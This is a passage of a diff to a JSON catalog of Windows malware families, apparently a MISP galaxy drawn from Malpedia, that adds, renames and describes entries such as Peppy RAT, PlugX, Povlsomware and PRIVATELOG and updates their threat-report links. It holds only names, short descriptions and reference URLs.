Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.peepy_rat", - "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" - ], - "synonyms": [], - "type": [] - }, - "uuid": "49321579-9dfe-45c6-80df-79467e4af65d", - "value": "Peepy RAT" - }, { "description": "", "meta": { @@ -23779,6 +27168,19 @@ "uuid": "a2fd9b8a-826d-4df5-9a29-d61a8456d086", "value": "Penco" }, + { + "description": "Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.peppy_rat", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "49321579-9dfe-45c6-80df-79467e4af65d", + "value": "Peppy RAT" + }, { "description": "", "meta": { @@ -23858,32 +27260,42 @@ "value": "Philadephia Ransom" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", "https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos", + "https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", "https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://securelist.com/cis-ransomware/104452/", + "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", "https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/", - "https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware" + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/" ], "synonyms": [], "type": [] }, "uuid": "d061daca-4415-4b3e-9034-231e37857eed", - "value": "Phobos Ransomware" + "value": "Phobos" }, { "description": "Keylogger, information stealer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_keylogger", + "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/", "https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger" ], "synonyms": [], @@ -23920,6 +27332,8 @@ "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.johannesbader.ch/2016/02/phorpiex/", + "https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/", + "https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/", "https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", @@ -23940,6 +27354,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" ], "synonyms": [], @@ -23968,7 +27383,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf" + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" ], "synonyms": [], "type": [] @@ -23976,6 +27392,19 @@ "uuid": "dec78ec5-f02d-461f-a8cc-cd4e80099e38", "value": "PILLOWMINT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pingback", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a05b1eba-8e89-4d05-97ef-cacc5a083913", + "value": "PingBack" + }, { "description": "", "meta": { @@ -24015,6 +27444,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", "https://isc.sans.edu/diary/rss/25068", + "http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.565.9211&rep=rep1&type=pdf", "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf", "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", "https://johannesbader.ch/2019/07/the-dga-of-pitou/" @@ -24160,87 +27590,108 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", - "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://community.rsa.com/thread/185439", + "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-president", + "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", + "https://www.recordedfuture.com/china-linked-ta428-threat-group", + "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", + "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", + "https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/", + "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", + "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/", + "https://blog.xorhex.com/blog/mustangpandaplugx-1/", + "https://www.youtube.com/watch?v=6SDdUVejR2w", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/", + "https://unit42.paloaltonetworks.com/thor-plugx-variant/", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", - "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/", - "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", + "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", + "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", + "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html", + "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", + "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://blog.ensilo.com/uncovering-new-activity-by-apt10", + "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", + "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", + "https://blog.xorhex.com/blog/reddeltaplugxchangeup/", + "https://securelist.com/time-of-death-connected-medicine/84315/", + "https://tracker.h3x.eu/info/290", + "https://www.contextis.com/de/blog/avivore", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf", + "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", + "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/", + "https://therecord.media/redecho-group-parks-domains-after-public-exposure/", + "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader", + "https://www.secureworks.com/research/threat-profiles/bronze-express", + "https://www.secureworks.com/research/threat-profiles/bronze-olive", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf", + "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", + "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/", "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", + "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://www.macnica.net/file/security_report_20160613.pdf", + "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://twitter.com/stvemillertime/status/1261263000960450562", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", + "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf", + "https://blog.xorhex.com/blog/mustangpandaplugx-2/", + "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html", - "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", - "https://www.secureworks.com/research/threat-profiles/bronze-firestone", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html", - "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-olive", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf", - "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", - "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/", - "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", "https://www.secureworks.com/research/bronze-president-targets-ngos", - "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", - "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html", - "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", - "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", - "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", - "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/", - "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", + "https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/", "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", - "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", - "https://blog.ensilo.com/uncovering-new-activity-by-apt10", - "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", - "https://www.secureworks.com/research/threat-profiles/bronze-riverside", - "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", - "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/", "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", - "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html", - "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", - "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.macnica.net/file/security_report_20160613.pdf", - "https://securelist.com/time-of-death-connected-medicine/84315/", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://twitter.com/xorhex/status/1399906601562165249?s=20", "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/", - "https://www.secureworks.com/research/threat-profiles/bronze-express", "https://www.secureworks.com/research/threat-profiles/bronze-woodland", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", - "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", - "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.contextis.com/de/blog/avivore", - "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", - "https://www.secureworks.com/research/threat-profiles/bronze-union", - "https://twitter.com/stvemillertime/status/1261263000960450562", "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", - "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf", "https://risky.biz/whatiswinnti/", - "https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/", - "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf", - "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader", - "https://securelist.com/cycldek-bridging-the-air-gap/97157/", - "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", - "https://www.secureworks.com/research/threat-profiles/bronze-keystone", - "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", - "https://www.secureworks.com/research/threat-profiles/bronze-atlas", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", - "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/", - "https://www.secureworks.com/research/threat-profiles/bronze-president" + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/", + "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html" ], "synonyms": [ "Destroy RAT", @@ -24334,6 +27785,7 @@ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", "https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/", "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", + "https://www.recordedfuture.com/china-linked-ta428-threat-group", "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf", "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", @@ -24350,11 +27802,13 @@ "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf", "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", "https://www.secureworks.com/research/threat-profiles/bronze-firestone", + "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-riverside", "http://blogs.360.cn/post/APT_C_01_en.html" ], @@ -24433,19 +27887,25 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", + "http://www.secureworks.com/research/threat-profiles/gold-evergreen", "http://www.secureworks.com/research/threat-profiles/gold-essex", + "https://www.youtube.com/watch?v=y8Z9KnL8s8s", "https://www.youtube.com/watch?v=EyDiIAt__dI", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", "https://www.secureworks.com/research/threat-profiles/gold-evergreen", "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf", + "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry", "https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection", "https://www.secureworks.com/research/threat-profiles/gold-galleon", + "http://www.secureworks.com/research/threat-profiles/gold-galleon", "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", "https://www.secureworks.com/research/threat-profiles/gold-essex", - "https://github.com/nyx0/Pony" + "https://github.com/nyx0/Pony", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/" ], "synonyms": [ "Fareit", @@ -24554,7 +28014,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp", "https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/", "https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/", - "https://twitter.com/just_windex/status/1162118585805758464" + "https://twitter.com/just_windex/status/1162118585805758464", + "https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf" ], "synonyms": [ "PUNCHTRACK" @@ -24569,7 +28030,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poulight_stealer", + "https://blog.360totalsecurity.com/en/a-txt-file-can-steal-all-your-secrets/?web_view=true", "https://www.carbonblack.com/blog/tau-threat-discovery-cryptocurrency-clipper-malware-evolves/", + "https://www.youtube.com/watch?v=MaPXDCq-Gf4", "https://twitter.com/MBThreatIntel/status/1240389621638402049?s=20" ], "synonyms": [ @@ -24580,6 +28043,19 @@ "uuid": "e4bcb3e4-17f6-4786-a19b-255c48a07f9a", "value": "Poulight Stealer" }, + { + "description": "According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to “securely” test the ransomware protection capabilities of security vendor products.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.povlsomware", + "https://www.trendmicro.com/en_us/research/21/c/povlsomware-ransomware-features-cobalt-strike-compatibility.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "632001f4-a313-4753-b876-f85df00bc387", + "value": "Povlsomware" + }, { "description": "", "meta": { @@ -24614,6 +28090,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powercat", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/", "https://twitter.com/VK_Intel/status/1141540229951709184" ], "synonyms": [], @@ -24754,6 +28231,7 @@ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://securelist.com/a-predatory-tale/89779", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", "https://www.secureworks.com/research/threat-profiles/gold-galleon", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware" @@ -24806,6 +28284,20 @@ "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", "value": "PrincessLocker" }, + { + "description": "Malware that abuses the Common Log File System (CLFS) to store/hide a second stage payload via registry transaction files.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.privatelog", + "https://twitter.com/ESETresearch/status/1433819369784610828", + "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "41bd3db9-a6f2-49b4-966a-3c710827fa82", + "value": "PRIVATELOG" + }, { "description": "", "meta": { @@ -24819,6 +28311,25 @@ "uuid": "d0c7815d-6039-436f-96ef-0767aabbdb36", "value": "Project Hook POS" }, + { + "description": "Ransomware written in .NET, apparently derived from the codebase of win.hakbit (Thanos) ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.prometheus", + "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware", + "https://medium.com/cycraft/prometheus-decryptor-6933e7bac1ea", + "https://twitter.com/inversecos/status/1441252744258461699?s=20", + "https://medium.com/s2wlab/prometheus-x-spook-prometheus-ransomware-rebranded-spook-ransomware-6f93bd8ab5dd", + "https://therecord.media/decryptor-released-for-prometheus-ransomware-victims/", + "https://id-ransomware.blogspot.com/2021/05/prometheus-ransomware.html", + "https://unit42.paloaltonetworks.com/prometheus-ransomware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5b5f10bf-2bbe-4019-810c-69eba58ebc81", + "value": "Prometheus" + }, { "description": "", "meta": { @@ -24837,7 +28348,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot", - "https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/" + "https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/", + "https://www.youtube.com/watch?v=FttiysUZmDw" ], "synonyms": [], "type": [] @@ -24988,8 +28500,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox", + "https://nao-sec.org/2021/04/exploit-kit-still-sharpens-a-sword.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/", + "https://s.tencent.com/research/report/1322.html", + "https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html", + "https://blog.malwarebytes.com/trojans/2021/03/perkiler-malware-turns-to-smb-brute-force-to-spread/", + "https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/", + "https://twitter.com/C0rk1_H/status/1412801973628272641?s=20", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware", - "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/" + 